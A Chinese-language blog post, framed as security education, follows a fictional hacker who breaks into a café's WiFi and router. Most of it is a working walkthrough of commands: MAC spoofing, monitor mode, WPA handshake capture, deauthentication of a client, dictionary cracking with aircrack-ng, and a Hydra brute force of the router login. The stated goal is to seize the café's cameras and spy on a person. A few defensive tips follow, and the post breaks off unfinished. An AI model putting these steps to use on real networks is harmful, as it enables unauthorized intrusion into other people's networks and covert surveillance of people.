关于一般人所不知道网络安全【科普-技术分析】
前言:
相信大家在前几年都可以经常看到来自各媒体所说的接入不知名WIFI而被盗号,刷卡等行为,首先这是非法的,不道德的。
再之前,他们也只是冰山一脚的说是某某人连接上“不知名”,“免费”的WIFI,而被盗取金钱账号等信息,可是你连着的wifi与网络就真的安全吗?
在此申明与提醒各位看官:
在安全里,个人还是觉得得先知其矛才可造其盾,为了更好的防护,我们还是要先了解其原理,才能避免他人的非法操作。
以下文所使用技术仅供交流学习用!
请勿用在非法途径上,请勿用在非法途径上,请勿用在非法途径上,(重要的事情说三遍啊)
不得乱用,所造成的后果与本人无关!(当然这技术也有点过时了)
下面我将以假设的故事线来进行分析如果有人真的想要盗你的资料的时候,你该怎么防护。
Story begin go~
小明是名黑客,这次他的目标是某公司叫小样的邮箱里一份邮件资料,小明为这次即将到手的鸭子做了些许准备,是不可能让这只鸭子给飞走的,通过社工手段(社工:全名为社会工程学,第一次由凯文·米特尼克在《欺骗的艺术》中曾提到,是一种通过人际交流的方式获得信息的非技术渗透手段,大致可分为广义与狭义,个人认为人肉搜索也是社工技术一部分,google hacking也是现阶段网络社工查找的一种主要方式之一,在本文中并不是重点所以不做过多的解释。)小明已经详细了解小样详细个人信息并邀约第二天下午到一家环境还不错并带有摄像头的咖啡厅见面(当然小明是不可能真的与小样见面的)。
第二天上午,小明带着自己的笔记本和外置无线网卡到了咖啡厅,找了个满意且合适的位置坐了下来。任务开始了,小明首先要做的就是破解掉店内的无线网络密码(一般店里是有提示wifi密码的,也可问服务员,咋们假设没有)。
过了许久小明利用kali系统成功爆破了wifi,他的方法如下:
爆破即为暴力破解:通过穷举法利用现有的密码对目标进行一 一验证所推出正确密码的一种方法
-
修改mac地址,稍微隐藏下自己咯
sudo ifconfig wlan0 down #将wlan0端口下线
sudo macchanger -m 00:11:22:33:44:55 wlan0 #修改mac地址,稍微隐藏自己
sudo ifconfig wlan0 up #将修改后的wlan0上线
-
开启无线网卡的监听模式
sudo airmon-ng start wlan0 #开启网卡监听模式
#利用ifconfig 查看wlan0监听模式是否开启
#开启后一般会变成wlan0mon
-
搜索周围的WiFi网络~
sudo airodump-ng wlan0mon #扫描附近wifi网络,网卡使用为刚刚开启的监听网卡
从上图看,小明一下就瞄准了他的目标WiFi:PDCN-2.4g,随后他记下此WiFi的BSSID和信道,然后 Ctrl+C 停止搜索。
而后对此WIFI抓取握手包 。
握手包:
1、当一个无线客户端与一个无线AP连接时,先发出连接认证请求(握手申请:你好!)
2、无线AP收到请求以后,将一段随机信息发送给无线客户端(你是?)
3、无线客户端将接收到的这段随机信息进行加密之后再发送给无线AP (这是我的名片)
4、无线AP检查加密的结果是否正确,如果正确则同意连接 (哦~ 原来是自己人呀!)
通常我们说的抓“握手包”,是指在无线AP与它的一个合法客户端在进行认证时,捕获“信息原文”和加密后的“密文”。————来自百度百科解释
sudo airodump-ng -c 7 --bssid 11:22:33:44:55:66 -w ~/wifi wlan0mon
#将信道为7,BSSID为:11:22:33:44:55:66 写入到目录为~/wifi
握手包抓取成功后可在WPA handshake:查看。
接着小明用aireplay-ng命令给STATION某个用户的MAC地址发送了一个反认证包,使其强制断开连接,而后它会自动再次连接wifi。
sudo aireplay-ng --deaut 20 -a 11:22:33:44:55:66 -c AA:BB:CC:DD:EE:FF wlan0mon
#目标路由器:11:22:33:44:55:66 某给用户的mac地址:AA:BB:CC:DD:EE:FF
#airplay-ng生效的前提是WiFi热点中必须至少已经接入一个设备
经过之前上面已经成功抓取到了握手包,现在要做的就是爆破了~~~
sudo aircrack-ng -a2 -b 11:22:33:44:55:66 -w ~/wifi/rockyou.txt ~/wifi/*.cap
#目标路由器:11:22:33:44:55:66
#密码字典: /usr/share/wordlist/rockyou.txt
#目标的信息生成文件存放地址:~/wifi/*.cap
哈哈,果然没错,小明微微一笑,早在来之前,小明就对这家咖啡店的进行了社工密码字典。
上面整套步骤的难点在于如何获得相应的密码字典,获取到的信息越多,所生成的字典越大,相应的成功率也越大。
当然,并不是一味的追求字典越大越好,准确率也是很重要的一环,因为字典越大,爆破时间也就越长。
爆破WIFI的方法还有很多种,例如wifite(其原理同上,只是把繁琐的指令变成了相对傻瓜似的操作)
在平常生活中,我们应该更好保护一些看似不重要的数字信息,设置密码是也不要用一些弱口令与一些生日,手机号等,相信我,这些东西做密码秒秒钟破解。
所谓弱口令比如8位密码:12345678,88888888 等等类型。
对了,当你发现你的wifi突然连上后又立刻断开反复循环也有可能是无线黑客正在对你wifi进行攻击,如泛洪攻击(Deauth攻击)如何解决? 就目前家用或者商场使用路由器来说,一般是难以抵挡的,攻击者的频道在2.4G,在可支持下建议开启5Gwifi,或者路由器开启防护防止泛洪攻击。
在拿到WIFI密码接上WIFI后,紧接着的就是取得这里的路由器密码了,其目的就是为了拿到咖啡店摄像头的控制权,而拿到摄像头控制权可以更好的对目标人物的一举一动进行监视。
同样的,使用Hydra进行进行爆破。
在进行爆破的时候,我们得先知道网关,可利用ifconifg进行查看。
sudo hydra -l admin -P ~/password/passwprd.txt -t 1 -vV -e ns 192.168.1.1 http-get /
睡觉了,后面再慢慢写
~~~~~~~~